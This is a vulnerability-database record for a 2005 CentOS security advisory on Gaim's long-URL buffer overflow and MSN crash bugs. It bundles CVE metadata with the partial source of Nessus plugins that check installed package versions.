ID CESA-2005:429 Type centos Reporter CentOS Project Modified 2005-05-12T00:26:03
Description
CentOS Errata and Security Advisory CESA-2005:429
The Gaim application is a multi-protocol instant messaging client.
A stack based buffer overflow bug was found in the way gaim processes a
message containing a URL. A remote attacker could send a carefully crafted
message resulting in the execution of arbitrary code on a victim's machine.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2005-1261 to this issue.
A bug was found in the way gaim handles malformed MSN messages. A remote
attacker could send a carefully crafted MSN message causing gaim to crash.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2005-1262 to this issue.
Users of Gaim are advised to upgrade to this updated package which contains
backported patches and is not vulnerable to these issues.
{"bulletinFamily": "unix", "affectedPackage": [{"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.src.rpm", "packageName": "gaim", "operator": "lt", "arch": "any", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.src.rpm", "packageName": "gaim", "operator": "lt", "arch": "any", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.ia64.rpm", "packageName": "gaim", "operator": "lt", "arch": "ia64", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.i386.rpm", "packageName": "gaim", "operator": "lt", "arch": "i386", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.i386.rpm", "packageName": "gaim", "operator": "lt", "arch": "i386", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.x86_64.rpm", "packageName": "gaim", "operator": "lt", "arch": "x86_64", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.s390.rpm", "packageName": "gaim", "operator": "lt", "arch": "s390", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.s390x.rpm", "packageName": "gaim", "operator": "lt", "arch": "s390x", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.src.rpm", "packageName": "gaim", "operator": "lt", "arch": "any", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.src.rpm", "packageName": "gaim", "operator": "lt", "arch": "any", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "5.0.4-0.iva.0.centos4", "packageFilename": "php-5.0.4-0.iva.0.centos4.src.rpm", "packageName": "php", "operator": "lt", "arch": "any", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "5.0.4-0.iva.0.centos4", "packageFilename": "php-5.0.4-0.iva.0.centos4.src.rpm", "packageName": "php", "operator": "lt", "arch": "any", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.x86_64.rpm", "packageName": "gaim", "operator": "lt", "arch": "x86_64", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.ia64.rpm", "packageName": "gaim", "operator": "lt", "arch": "ia64", "OSVersion": "3"}], "viewCount": 1, "reporter": "CentOS Project", "references": ["http://iki.fi/upi/", "https://rhn.redhat.com/errata/RHSA-2005-429.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "description": "**CentOS Errata and Security Advisory** CESA-2005:429\n\n\nThe Gaim application is a multi-protocol instant messaging client.\r\n\r\nA stack based buffer overflow bug was found in the way gaim processes a\r\nmessage containing a URL. A remote attacker could send a carefully crafted\r\nmessage resulting in the execution of arbitrary code on a victim's machine.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2005-1261 to this issue.\r\n\r\nA bug was found in the way gaim handles malformed MSN messages. A remote\r\nattacker could send a carefully crafted MSN message causing gaim to crash.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2005-1262 to this issue.\r\n\r\nUsers of Gaim are advised to upgrade to this updated package which contains\r\nbackported patches and is not vulnerable to these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011639.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011640.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011641.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011647.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011652.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011653.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011658.html\n\n**Affected packages:**\ngaim\nphp\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-429.html", "hashmap": [{"key": "affectedPackage", "hash": "262601b561ccc4bd555ea1d373cc5c48"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "d4f1aa967dda1c7309239c01a305a8c0"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "75a5a109593e842ae6e58e249a0e2eb1"}, {"key": "href", "hash": "f64ba49662215f7ea37c06784449b78c"}, {"key": "modified", "hash": "be5c340331e757c6d0462effd7c247a1"}, {"key": "published", "hash": "6f1afc040c1febd942a7c963af087aa9"}, {"key": "references", "hash": "ec6260dc3df52a95eed422e9bcd00371"}, {"key": "reporter", "hash": "9855627921475e40e00f92d60af14cb3"}, {"key": "title", "hash": "1436890d2966551a7d80aa35ab7e3ffa"}, {"key": "type", "hash": "cdc872db616ac66adb3166c75e9ad183"}], "href": "http://lists.centos.org/pipermail/centos-announce/2005-May/011639.html", "modified": "2005-05-12T00:26:03", "objectVersion": "1.3", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "id": "CESA-2005:429", "title": "gaim, php security update", "hash": "2b3bfc7ddd6ce2e2289699cbd0584ee8473e3e0fa3a9e0dacbae18aa00c310d4", "edition": 2, "published": "2005-05-11T14:48:17", "type": "centos", "history": [{"lastseen": "2017-10-03T18:25:28", "bulletin": {"published": "2005-05-11T14:48:17", "enchantments": {}, "id": "CESA-2005:429", "bulletinFamily": "unix", "title": "gaim, php security update", "affectedPackage": [{"OS": "CentOS", "packageVersion": "5.0.4-0.iva.0.centos4", "packageFilename": "php-5.0.4-0.iva.0.centos4.src.rpm", "packageName": "php", "operator": "lt", "arch": "any", "OSVersion": "any"}, {"OS": "CentOS", "packageVersion": "5.0.4-0.iva.0.centos4", "packageFilename": "php-5.0.4-0.iva.0.centos4.src.rpm", "packageName": "php", "operator": "lt", "arch": "any", "OSVersion": "any"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.src.rpm", "packageName": "gaim", "operator": "lt", "arch": "any", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.src.rpm", "packageName": "gaim", "operator": "lt", "arch": "any", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.ia64.rpm", "packageName": "gaim", "operator": "lt", "arch": "ia64", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.i386.rpm", "packageName": "gaim", "operator": "lt", "arch": "i386", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.i386.rpm", "packageName": "gaim", "operator": "lt", "arch": "i386", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.x86_64.rpm", "packageName": "gaim", "operator": "lt", "arch": "x86_64", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.s390.rpm", "packageName": "gaim", "operator": "lt", "arch": "s390", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.s390x.rpm", "packageName": "gaim", "operator": "lt", "arch": "s390x", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.src.rpm", "packageName": "gaim", "operator": "lt", "arch": "any", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.src.rpm", "packageName": "gaim", "operator": "lt", "arch": "any", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el4", "packageFilename": "gaim-1.2.1-6.el4.x86_64.rpm", "packageName": "gaim", "operator": "lt", "arch": "x86_64", "OSVersion": "4"}, {"OS": "CentOS", "packageVersion": "1.2.1-6.el3", "packageFilename": "gaim-1.2.1-6.el3.ia64.rpm", "packageName": "gaim", "operator": "lt", "arch": "ia64", "OSVersion": "3"}], "hash": "0c15ed7f748abbbe1c119f4be8e4b3715f1afa3bc88f3dc744b7cf9b9e9625d4", "viewCount": 0, "edition": 1, "cvelist": ["CVE-2005-1262", "CVE-2005-1261"], "references": ["http://iki.fi/upi/", "https://rhn.redhat.com/errata/RHSA-2005-429.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "objectVersion": "1.3", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "**CentOS Errata and Security Advisory** CESA-2005:429\n\n\nThe Gaim application is a multi-protocol instant messaging client.\r\n\r\nA stack based buffer overflow bug was found in the way gaim processes a\r\nmessage containing a URL. A remote attacker could send a carefully crafted\r\nmessage resulting in the execution of arbitrary code on a victim's machine.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2005-1261 to this issue.\r\n\r\nA bug was found in the way gaim handles malformed MSN messages. A remote\r\nattacker could send a carefully crafted MSN message causing gaim to crash.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2005-1262 to this issue.\r\n\r\nUsers of Gaim are advised to upgrade to this updated package which contains\r\nbackported patches and is not vulnerable to these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011639.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011640.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011641.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011647.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011652.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011653.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011658.html\n\n**Affected packages:**\ngaim\nphp\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-429.html", "hashmap": [{"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "cvelist", "hash": "d4f1aa967dda1c7309239c01a305a8c0"}, {"key": "href", "hash": "f64ba49662215f7ea37c06784449b78c"}, {"key": "reporter", "hash": "9855627921475e40e00f92d60af14cb3"}, {"key": "published", "hash": "6f1afc040c1febd942a7c963af087aa9"}, {"key": "title", "hash": "1436890d2966551a7d80aa35ab7e3ffa"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "type", "hash": "cdc872db616ac66adb3166c75e9ad183"}, {"key": "affectedPackage", "hash": "692a82a8a47383bf05fff04b39c6e692"}, {"key": "modified", "hash": "be5c340331e757c6d0462effd7c247a1"}, {"key": "references", "hash": "ec6260dc3df52a95eed422e9bcd00371"}, {"key": "description", "hash": "75a5a109593e842ae6e58e249a0e2eb1"}], "href": "http://lists.centos.org/pipermail/centos-announce/2005-May/011639.html", "modified": "2005-05-12T00:26:03", "lastseen": "2017-10-03T18:25:28", "reporter": "CentOS Project", "type": "centos"}, "differentElements": ["affectedPackage"], "edition": 1}], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2005-1262", "CVE-2005-1261"], "lastseen": "2017-10-12T14:45:22"}
{"cve": [{"lastseen": "2018-10-20T11:06:09", "references": ["http://www.securityfocus.com/archive/1/426078/100/0/threaded", "http://www.securityfocus.com/bid/13590", "http://www.redhat.com/support/errata/RHSA-2005-432.html", "http://www.vupen.com/english/advisories/2005/0519", "http://gaim.sourceforge.net/security/index.php?id=16", "http://www.redhat.com/support/errata/RHSA-2005-429.html"], "description": "Stack-based buffer overflow in the URL parsing function in Gaim before 1.3.0 allows remote attackers to execute arbitrary code via an instant message (IM) with a large URL.", "edition": 3, "reporter": "NVD", "published": "2005-05-11T00:00:00", "title": "CVE-2005-1261", "type": "cve", "enchantments": {"score": {"modified": "2018-10-20T11:06:09", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10725", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10725"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2005-1261"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10725", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10725"}], "modified": "2018-10-19T11:31:33", "cpe": ["cpe:/a:rob_flynn:gaim:1.1.3", "cpe:/a:rob_flynn:gaim:1.0.3", "cpe:/a:rob_flynn:gaim:0.10", "cpe:/a:rob_flynn:gaim:1.0.0", "cpe:/a:rob_flynn:gaim:0.54", "cpe:/a:rob_flynn:gaim:0.63", "cpe:/a:rob_flynn:gaim:0.60", "cpe:/a:rob_flynn:gaim:1.1.0", "cpe:/a:rob_flynn:gaim:0.68", "cpe:/a:rob_flynn:gaim:0.81", "cpe:/a:rob_flynn:gaim:0.66", "cpe:/a:rob_flynn:gaim:1.0.1", "cpe:/a:rob_flynn:gaim:0.57", "cpe:/a:rob_flynn:gaim:0.73", "cpe:/a:rob_flynn:gaim:0.52", "cpe:/a:rob_flynn:gaim:1.1.2", "cpe:/a:rob_flynn:gaim:0.61", "cpe:/a:rob_flynn:gaim:1.1.1", "cpe:/a:rob_flynn:gaim:0.71", "cpe:/a:rob_flynn:gaim:0.75", "cpe:/a:rob_flynn:gaim:0.55", "cpe:/a:rob_flynn:gaim:1.2.0", "cpe:/a:rob_flynn:gaim:0.77", "cpe:/a:rob_flynn:gaim:0.80", "cpe:/a:rob_flynn:gaim:0.59.1", "cpe:/a:rob_flynn:gaim:0.72", "cpe:/a:rob_flynn:gaim:0.67", "cpe:/a:rob_flynn:gaim:0.65", "cpe:/a:rob_flynn:gaim:0.50", "cpe:/a:rob_flynn:gaim:0.59", "cpe:/a:rob_flynn:gaim:0.53", "cpe:/a:rob_flynn:gaim:0.10.3", "cpe:/a:rob_flynn:gaim:0.58", "cpe:/a:rob_flynn:gaim:0.70", "cpe:/a:rob_flynn:gaim:0.82", "cpe:/a:rob_flynn:gaim:0.76", "cpe:/a:rob_flynn:gaim:0.62", "cpe:/a:rob_flynn:gaim:0.64", "cpe:/a:rob_flynn:gaim:0.82.1", "cpe:/a:rob_flynn:gaim:0.69", "cpe:/a:rob_flynn:gaim:0.79", "cpe:/a:rob_flynn:gaim:0.56", "cpe:/a:rob_flynn:gaim:1.0.2", "cpe:/a:rob_flynn:gaim:1.2.1", "cpe:/a:rob_flynn:gaim:0.78", "cpe:/a:rob_flynn:gaim:0.74", "cpe:/a:rob_flynn:gaim:0.51", "cpe:/a:rob_flynn:gaim:1.1.4"], "id": "CVE-2005-1261", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1261", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-20T11:06:09", "references": ["http://www.securityfocus.com/archive/1/426078/100/0/threaded", "http://www.securityfocus.com/bid/13591", "http://gaim.sourceforge.net/security/index.php?id=17", "http://www.vupen.com/english/advisories/2005/0519", "http://www.novell.com/linux/security/advisories/2005_36_sudo.html", "http://www.redhat.com/support/errata/RHSA-2005-429.html"], "description": "Gaim 1.2.1 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed MSN message.", "edition": 3, "reporter": "NVD", "published": "2005-05-11T00:00:00", "title": "CVE-2005-1262", "type": "cve", "enchantments": {"score": {"modified": "2018-10-20T11:06:09", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10861", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10861"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2005-1262"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10861", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10861"}], "modified": "2018-10-19T11:31:33", "cpe": ["cpe:/a:rob_flynn:gaim:1.1.3", "cpe:/a:rob_flynn:gaim:1.0.3", "cpe:/a:rob_flynn:gaim:0.10", "cpe:/a:rob_flynn:gaim:1.0.0", "cpe:/a:rob_flynn:gaim:0.54", "cpe:/a:rob_flynn:gaim:0.63", "cpe:/a:rob_flynn:gaim:0.60", "cpe:/a:rob_flynn:gaim:1.1.0", "cpe:/a:rob_flynn:gaim:0.68", "cpe:/a:rob_flynn:gaim:0.81", "cpe:/a:rob_flynn:gaim:0.66", "cpe:/a:rob_flynn:gaim:1.0.1", "cpe:/a:rob_flynn:gaim:0.57", "cpe:/a:rob_flynn:gaim:0.73", "cpe:/a:rob_flynn:gaim:0.52", "cpe:/a:rob_flynn:gaim:1.1.2", "cpe:/a:rob_flynn:gaim:0.61", "cpe:/a:rob_flynn:gaim:1.1.1", "cpe:/a:rob_flynn:gaim:0.71", "cpe:/a:rob_flynn:gaim:0.75", "cpe:/a:rob_flynn:gaim:0.55", "cpe:/a:rob_flynn:gaim:1.2.0", "cpe:/a:rob_flynn:gaim:0.77", "cpe:/a:rob_flynn:gaim:0.80", "cpe:/a:rob_flynn:gaim:0.59.1", "cpe:/a:rob_flynn:gaim:0.72", "cpe:/a:rob_flynn:gaim:0.67", "cpe:/a:rob_flynn:gaim:0.65", "cpe:/a:rob_flynn:gaim:0.50", "cpe:/a:rob_flynn:gaim:0.59", "cpe:/a:rob_flynn:gaim:0.53", "cpe:/a:rob_flynn:gaim:0.10.3", "cpe:/a:rob_flynn:gaim:0.58", "cpe:/a:rob_flynn:gaim:0.70", "cpe:/a:rob_flynn:gaim:0.82", "cpe:/a:rob_flynn:gaim:0.76", "cpe:/a:rob_flynn:gaim:0.62", "cpe:/a:rob_flynn:gaim:0.64", "cpe:/a:rob_flynn:gaim:0.82.1", "cpe:/a:rob_flynn:gaim:0.69", "cpe:/a:rob_flynn:gaim:0.79", "cpe:/a:rob_flynn:gaim:0.56", "cpe:/a:rob_flynn:gaim:1.0.2", "cpe:/a:rob_flynn:gaim:1.2.1", "cpe:/a:rob_flynn:gaim:0.78", "cpe:/a:rob_flynn:gaim:0.74", "cpe:/a:rob_flynn:gaim:0.51", "cpe:/a:rob_flynn:gaim:1.1.4"], "id": "CVE-2005-1262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1262", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:47:18", "references": ["https://security.gentoo.org/glsa/200505-09"], "pluginID": "18252", "description": "The remote host is affected by the vulnerability described in GLSA-200505-09 (Gaim: Denial of Service and buffer overflow vulnerabilties)\n\n Stu Tomlinson discovered that Gaim is vulnerable to a remote stack based buffer overflow when receiving messages in certain protocols, like Jabber and SILC, with a very long URL (CAN-2005-1261). Siebe Tolsma discovered that Gaim is also vulnerable to a remote Denial of Service attack when receiving a specially crafted MSN message (CAN-2005-1262).\n Impact :\n\n A remote attacker could cause a buffer overflow by sending an instant message with a very long URL, potentially leading to the execution of malicious code. By sending a SLP message with an empty body, a remote attacker could cause a Denial of Service or crash of the Gaim client.\n Workaround :\n\n There are no known workarounds at this time.", "edition": 5, "reporter": "Tenable", "published": "2005-05-12T00:00:00", "title": "GLSA-200505-09 : Gaim: Denial of Service and buffer overflow vulnerabilties", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1262", "CVE-2005-1261"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:gaim"], "id": "GENTOO_GLSA-200505-09.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18252", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200505-09.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18252);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-1261\", \"CVE-2005-1262\");\n script_xref(name:\"GLSA\", value:\"200505-09\");\n\n script_name(english:\"GLSA-200505-09 : Gaim: Denial of Service and buffer overflow vulnerabilties\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200505-09\n(Gaim: Denial of Service and buffer overflow vulnerabilties)\n\n Stu Tomlinson discovered that Gaim is vulnerable to a remote stack\n based buffer overflow when receiving messages in certain protocols,\n like Jabber and SILC, with a very long URL (CAN-2005-1261). Siebe\n Tolsma discovered that Gaim is also vulnerable to a remote Denial of\n Service attack when receiving a specially crafted MSN message\n (CAN-2005-1262).\n \nImpact :\n\n A remote attacker could cause a buffer overflow by sending an\n instant message with a very long URL, potentially leading to the\n execution of malicious code. By sending a SLP message with an empty\n body, a remote attacker could cause a Denial of Service or crash of the\n Gaim client.\n \nWorkaround :\n\n There are no known workarounds at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200505-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Gaim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/gaim-1.3.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/gaim\", unaffected:make_list(\"ge 1.3.0\"), vulnerable:make_list(\"lt 1.3.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Gaim\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:43:00", "references": ["http://rhn.redhat.com/errata/RHSA-2005-429.html", "https://www.redhat.com/security/data/cve/CVE-2005-1261.html", "https://www.redhat.com/security/data/cve/CVE-2005-1262.html"], "pluginID": "18240", "description": "An updated gaim package that fixes two security issues is now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Gaim application is a multi-protocol instant messaging client.\n\nA stack based buffer overflow bug was found in the way gaim processes a message containing a URL. A remote attacker could send a carefully crafted message resulting in the execution of arbitrary code on a victim's machine. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1261 to this issue.\n\nA bug was found in the way gaim handles malformed MSN messages. A remote attacker could send a carefully crafted MSN message causing gaim to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1262 to this issue.\n\nUsers of Gaim are advised to upgrade to this updated package which contains backported patches and is not vulnerable to these issues.", "edition": 6, "reporter": "Tenable", "published": "2005-05-11T00:00:00", "title": "RHEL 3 / 4 : gaim (RHSA-2005:429)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1262", "CVE-2005-1261"], "modified": "2018-08-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:gaim"], "id": "REDHAT-RHSA-2005-429.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18240", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:429. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18240);\n script_version (\"1.18\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2005-1261\", \"CVE-2005-1262\");\n script_xref(name:\"RHSA\", value:\"2005:429\");\n\n script_name(english:\"RHEL 3 / 4 : gaim (RHSA-2005:429)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated gaim package that fixes two security issues is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Gaim application is a multi-protocol instant messaging client.\n\nA stack based buffer overflow bug was found in the way gaim processes\na message containing a URL. A remote attacker could send a carefully\ncrafted message resulting in the execution of arbitrary code on a\nvictim's machine. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-1261 to this issue.\n\nA bug was found in the way gaim handles malformed MSN messages. A\nremote attacker could send a carefully crafted MSN message causing\ngaim to crash. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-1262 to this issue.\n\nUsers of Gaim are advised to upgrade to this updated package which\ncontains backported patches and is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2005-1261.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2005-1262.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2005-429.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gaim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/11\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/02/17\");\n script_end_attributes();\n\n 